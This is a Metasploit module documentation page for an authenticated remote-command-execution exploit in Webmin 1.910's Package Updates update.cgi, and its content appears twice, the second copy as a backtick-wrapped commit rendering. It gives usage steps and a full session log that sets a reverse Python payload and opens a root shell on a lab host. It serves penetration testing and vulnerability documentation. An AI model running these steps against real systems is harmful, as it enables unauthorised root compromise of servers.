documentation/modules/exploit/linux/http/webmin_packageup_rce.md

## Description

This module exploits an arbitrary command execution vulnerability in Webmin
1.910 and lower versions. any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.

## Vulnerable Application

This module has been tested with [Webmin 1.910](https://sourceforge.net/projects/webadmin/files/webmin/1.910/)

## Verification Steps

1. `use exploit/lunix/http/webmin_packageup_rce`
2. `set rhosts <rhost>`
3. `set username <username>`
4. `set password <password>`
5. `exploit`

## Scenarios

### Tested Webmin 1.910 on Debian Linux 4.19.28-2kali1 x64

```
msf5 >
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf5 exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME rce
USERNAME => rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD password
PASSWORD => password
msf5 exploit(linux/http/webmin_packageup_rce) > check

[*] NICE! rce has the right to >>Package Update<<
[+] 192.168.1.9:10000 - The target is vulnerable.
msf5 exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.12:4444 
[+] Session cookie: 1947b5dfd62403b8f1f58f497e88b1e5
[*] Attempting to execute the payload...
[*] Command shell session 12 opened (192.168.1.12:4444 -> 192.168.1.9:47552) at 2019-06-16 18:21:46 -0400

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux AkkuS 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
pwd
/usr/share/webmin/package-updates/
exit
```
Adding module documentation 2019-06-16 18:27:01 -04:00			`## Description`

			`This module exploits an arbitrary command execution vulnerability in Webmin`
			`1.910 and lower versions. any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.`

			`## Vulnerable Application`

			`This module has been tested with [Webmin 1.910](https://sourceforge.net/projects/webadmin/files/webmin/1.910/)`

			`## Verification Steps`

			1. `use exploit/lunix/http/webmin_packageup_rce`
			2. `set rhosts <rhost>`
			3. `set username <username>`
			4. `set password <password>`
			5. `exploit`

			`## Scenarios`

			`### Tested Webmin 1.910 on Debian Linux 4.19.28-2kali1 x64`

			```
			`msf5 >`
			`msf5 > use exploit/linux/http/webmin_packageup_rce`
			`msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9`
			`RHOSTS => 192.168.1.9`
			`msf5 exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python`
			`PAYLOAD => cmd/unix/reverse_python`
			`msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.12`
			`LHOST => 192.168.1.12`
			`msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME rce`
			`USERNAME => rce`
			`msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD password`
			`PASSWORD => password`
			`msf5 exploit(linux/http/webmin_packageup_rce) > check`

			`[*] NICE! rce has the right to >>Package Update<<`
			`[+] 192.168.1.9:10000 - The target is vulnerable.`
			`msf5 exploit(linux/http/webmin_packageup_rce) > exploit`

			`[*] Started reverse TCP handler on 192.168.1.12:4444`
			`[+] Session cookie: 1947b5dfd62403b8f1f58f497e88b1e5`
			`[*] Attempting to execute the payload...`
			`[*] Command shell session 12 opened (192.168.1.12:4444 -> 192.168.1.9:47552) at 2019-06-16 18:21:46 -0400`

			`id`
			`uid=0(root) gid=0(root) groups=0(root)`
			`uname -a`
			`Linux AkkuS 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux`
			`pwd`
			`/usr/share/webmin/package-updates/`
			`exit`
			```